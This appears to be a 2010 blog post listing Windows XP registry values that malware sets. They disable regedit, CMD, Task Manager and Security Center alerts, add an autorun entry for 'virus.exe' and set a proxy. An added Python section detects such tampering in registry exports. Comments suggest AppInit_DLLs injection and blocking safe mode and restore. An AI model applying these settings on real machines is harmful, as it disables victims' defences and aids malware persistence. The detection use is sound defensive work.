Monday 20 September 2010

WinXP Registry keys that can interest bad guys


;.: WinXP Registry keys that can interest bad guys :.
;               Xylitol ~ Horadrim (ssteam)
;Found with http://technet.microsoft.com/en-us/library/cc778196%28WS.10%29.aspx


;Disable regedit:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

;Disable CMD:
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000001

;Disable TaskManager:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

;Disable AV notification (Security Center settings):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify"=dword:00000001

;Disable Firewall notification (Security Center settings):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify"=dword:00000001

;Disable Update notification (Security Center settings; 1 = notifications off):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify"=dword:00000001

;Ignore AV (Security Center settings; 1 = Security Center stops monitoring AV state):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntivirusOverride"=dword:00000001

;Ignore Firewall (Security Center settings; 1 = Security Center stops monitoring the firewall):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirewallOverride"=dword:00000001

;This is sometimes important, because some malware creates a small
;local proxy to insert iframes, redirect you to different pages, etc.
;(ProxyServer takes host:port; 127.0.0.1:8080 is a placeholder loopback proxy,
;and <local> makes local addresses bypass it):
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"="127.0.0.1:8080"
"ProxyEnable"=dword:00000001
"ProxyOverride"="<local>"

;Hide All System Tray Icons:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoTrayItemsDisplay"=dword:00000001

;Disable balloon tips:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"EnableBalloonTips"=dword:00000000

;Add text to the system tray clock:
[HKEY_CURRENT_USER\Control Panel\International]
"s1159"=" VIRUS!"
"s2359"=" VIRUS!"
"sTimeFormat"="HH:mm:ss.tt"

;IE settings:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Microsoft Internet Explorer"
"Start Page"="about:blank"
"Disable Script Debugger"="yes"
"NotifyDownloadComplete"="yes"

;Autorun (backslashes are doubled in .reg string values):
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"virus"="C:\\virus.exe"

;Disable the security center:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc]
"Start"=dword:00000004

;wallpaper:
[HKEY_CURRENT_USER\Control Panel\Desktop]
"Wallpaper"="C:\\virus.bmp"

;Disable error sound:
[HKEY_CURRENT_USER\Control Panel\Sound]
"Beep"="no"
"ExtendedSounds"="no"

;Disable the error reporting service:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc]
"Start"=dword:00000004

;Hide the computer from the network browse list:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"Hidden"=dword:00000001
Non-exhaustive list.
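As a defender's counterpart to the list above, here is an added example (not part of the original post) that parses a `reg export` file and flags the lock-down values listed on this page; the sample export it runs on is constructed, not taken from a real host.

```python
import re

# Tamper indicators from the list above, (key, value name) -> value malware sets.
# Keys and names are compared case-insensitively, as the registry does.
INDICATORS = {
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools"): "dword:00000001",
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr"): "dword:00000001",
    (r"HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD"): "dword:00000001",
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center", "AntiVirusDisableNotify"): "dword:00000001",
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center", "FirewallDisableNotify"): "dword:00000001",
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc", "Start"): "dword:00000004",
}
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.+)$')  # "Name"=value lines

def parse_reg(text):
    """Parse .reg text into {key: {name: raw value}}; skips comments, the header, @= defaults and hex(...) continuation lines."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";@" or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and (m := VALUE_RE.match(line)):
            keys[current][m.group(1).lower()] = m.group(2).strip().rstrip("\\")
    return keys

def find_tampering(text):
    """Return [(key, name, value)] for every indicator present with its bad value."""
    reg, hits = parse_reg(text), []
    for (key, name), bad in INDICATORS.items():
        got = reg.get(key.lower(), {}).get(name.lower())
        if got is not None and got.lower() == bad:
            hits.append((key, name, got))
    return hits

# Constructed sample export (shape of `reg export` output), not from a real host.
SAMPLE = r"""Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
"DisableTaskMgr"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc]
"Start"=dword:00000004
"ImagePath"=hex(2):25,00,53,00,\
  79,00,00,00
"""
```

Run `find_tampering(open("export.reg", encoding="utf-16").read())` on a real export (`reg export` writes UTF-16) to audit a host; a hit does not prove infection, since policies also set these values, but it is worth explaining.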

2 comments:

  1. I would even add: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs, which on OSes up to and including XP lets you change the DLLs loaded at startup by USER32.dll => cool for a DLL injection. By the way, an article on all types of DLL injections and r3 hooks is coming soon on my blog.
  2. I would also add SafeBoot, to prevent booting into safe mode, and SystemRestore, to prevent rolling back to a clean restore point.